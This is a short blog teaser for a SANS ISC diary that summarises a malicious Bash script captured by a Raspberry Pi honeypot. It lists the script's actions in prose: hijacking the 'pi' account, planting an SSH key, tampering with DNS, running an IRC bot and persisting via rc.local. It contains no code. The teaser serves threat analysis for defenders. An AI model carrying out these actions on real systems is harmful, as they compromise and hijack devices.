I published the following diary on isc.sans.org: “Malicious Network Traffic From /bin/bash“:
One of our readers from Germany sent me a malicious shell script captured by our honeypot running on his Raspberry. It’s a simple UNIX Bash script that performs a bunch of malicious tasks:
- Kills existing crypto miner processes (classic action these days)
- Changes the password of the user ‘pi’ and adds an SSHÂ key
- Changes the DNS resolver configuration and add some DNS blackholes in /etc/hosts (redirecting to 127.0.0.1)
- Creates an IRC bot
- Installs extra tools like zmap and sshpass
- Installs itself in /etc/rc.local for persistence
[Read more]